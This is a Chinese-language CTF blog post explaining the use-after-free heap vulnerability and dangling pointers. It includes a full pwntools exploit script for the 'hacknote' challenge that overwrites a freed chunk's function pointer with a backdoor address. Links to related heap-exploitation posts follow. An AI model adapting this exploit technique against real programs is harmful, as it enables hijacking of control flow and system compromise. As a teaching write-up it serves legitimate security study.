UAF(use_after_free)

发表于2025-03-10|更新于2025-04-04|PWN

|浏览量:

原理

我们将Use After Free翻译过来就是释放后使用：当一个指针所指向的指针块被释放掉之后可以再次被使用，
但是这是由要求的，不妨将所有的情况列举出来：

chunk被释放之后，其对应的指针被设置为NULL，如果再次使用它，程序就会崩溃。
chunk被释放之后，其对应的指针未被设置为NULL，如果在下一次使用之前没有代码对这块内存进行修改，那么再次使用这个指针时程序很有可能正常运转。
内存块被释放后，其对应的指针没有被设置为NULL，但是在它下一次使用之前，有代码对这块内存进行了修改，那么当程序再次使用这块内存时，就很有可能会出现奇怪的问题。
在堆中Use After Free一般指的是后两种漏洞，我们一般称被释放后没有被设置为NULL的内存指针为dangling pointer(悬空指针、悬垂指针)。

未被初始化过的内存指针称为野指针

例题

delete函数未将指针置空，存在UAF漏洞

因为free chunk之后没有将ptr = null

释放两个chunk后, tcache中会有两个0x10大小的chunk, 再申请8字节的chunk, 会返回两个chunk, 后一个chunk就是之前的chunk0, 写入后门函数就会覆盖原chunk0的函数地址print_note, 新生成的note不是chunk0, 而是chunk3, 本题的UAF是指释放chunk0后, 又使用了chunk0

from pwn import *
 
r = process('./hacknote')
 
 
def addnote(size, content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)
 
def delnote(idx):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
 
def printnote(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))
 
 
#gdb.attach(r)
magic = 0x08048986
 
addnote(20, "note1") # add note 0
addnote(20, "note2") # add note 1
 
delnote(0) # delete note 0
delnote(1) # delete note 1
 
addnote(8, p32(magic)) # add note 2
 
printnote(0) # print note 0
r.interactive()

文章作者: Zechariah

文章链接: https://zechariah-0703.github.io/2025/03/10/UAF-use-after-free/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Zechariahの博客！

赞助

微信
支付宝

相关推荐

fastbin_attack系列

fastbin_attackIntroductionfastbin attack指所有基于fastbin机制的漏洞利用方法，利用前提：存在堆溢出、uaf等能控制chunk内容的漏洞漏洞发生于 fastbin类型的chunk中细分可做到如下分类 Fastbin Double Free House of Spirit Fastbin Double Free 和 House of Spirit 侧重“正常由用户创建的chunk”和“由攻击者伪造的chunk”，然后再次申请chunk进行攻击 Alloc to Stack Arbitary Alloc Alloc to Stack 和 Arbitary Alloc 侧重利用堆溢出等方式修改chunk的fd指针，即直接申请指定位置的chunk进行攻击 Principleif a chunk is freed and goes into fastbin the prev_inuse flag of the next heap will not be cleared PREV_INUSE(abbreviated a...

unlinkunlink是什么？Index of /gnu/glibc unlink其实是libc中定义的一个宏，定义如下： #define unlink(AV, P, BK, FD) { FD = P->fd; BK = P->bk; if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) malloc_printerr (check_action, "corrupted double-linked list", P, AV); else { FD->bk = BK; BK->fd = FD; if (!in_smallbin_range...

堆入门-__malloc_hook和__free_hook劫持原理

malloc_hook和free_hook劫持原理_freehook-CSDN博客打堆的一个关键的方法就是劫持堆相关函数中的 hook 函数。即在堆中的三大 hook 函数，malloc_hook、realloc_hook、free_hook Hook介绍 hook 的就是劫持函数指针，控制程序的执行，让函数执行我们所指定的函数。 hook 翻译过来是钩子。假设 a 函数中有这样一个执行过程：判断b函数指针是否为空，如果不为空就先b函数指针所指向的函数。这样当我们使用 b 钩子的时候，我们在执行 a 函数，执行流就会被 b 钩子给钩过来，这样就达到了执行 b 函数指针所指向的函数地址。为了方便调试程序，在 glibc 中有四个比较重要的函数指针，分别是 malloc_hook、free_hook、realloc_hook、exit_hook。我们可以通过一些堆漏洞或者其他漏洞就可以将原本指向 NULL 的这些函数指针，修改为 one_gadget，这样我们在满足一定的条件后就可以 getshell，这样就是 pwn 中的劫持 hook 函数最常见的用法。 malloc...

堆相关整理

What is 堆？明确一下堆的概念，堆不同于栈，堆是动态分配的（由操作系统内核或者堆管理器），只有在程序中需要时才会分配。在 CTF 的 pwn 程序中，栈是程序加载进内存后就会出现，而堆是由 malloc、alloc、realloc 函数分配内存后才会出现。 windows 和 linux 下的堆分配、管理方式都不同，这里主要讲到的是 CTF 中常出现的 linux 下的堆分配知识先看看堆在虚拟内存中的位置堆的生长方向是从低地址向高地址生长的，而栈是从高地址向低地址生长的。实际上堆可以申请到的内存空间比栈要大很多，在 linux 的 4G 的虚拟内存空间里最高可以达到 2.9 G 的空间对堆操作的是由堆管理器（ptmalloc2）来实现的，而不是操作系统内核。因为程序每次申请或者释放堆时都需要进行系统调用，系统调用的开销巨大，当频繁进行堆操作时，就会严重影响程序的性能下面的分析都是以 glibc 库下的 ptmalloc2 堆管理器来讲解的。一、堆的基本结构先简单的画一个图吧：堆的结构malloc_chunk的结构 malloc_chunk结构每个程序分配的...

Art_of_shellcode

很有用的网址https://www.exploit-db.com/shellcodes https://v3rdant.cn/Pwn.The-Art-of-Shellcode/ PWN:手动编写 x64 基于syscall 的 shell code(TODO)_x64 syscall pwn-CSDN博客

ELF文件保护机制

Linux ELF文件的保护主要有四种：Canary、NX、PIE、RELRO 1.CanaryStackCanary表示栈的报警保护。在函数返回值之前添加的一串随机数（不超过机器字长）（也叫做cookie），末位为/x00（提供了覆盖最后一字节输出泄露Canary的可能），如果出现缓冲区溢出攻击，覆盖内容覆盖到Canary处，就会改变原本该处的数值，当程序执行到此处时，会检查Canary值是否跟开始的值一样，如果不一样，程序会崩溃，从而达到保护返回地址的目的。 //GCC用法gcc -o test test.c // 默认情况下，不开启Canary保护gcc -fno-stack-protector -o test test.c //禁用栈保护gcc -fstack-protector -o test test.c //启用堆栈保护，不过只为局部变量中含有 char 数组的函数插入保护代码gcc -fstack-protector-all -o test test.c //启用堆栈保护，为所有函数插入保护代码-fno-stack-protector /-fstack-prote...

数据加载中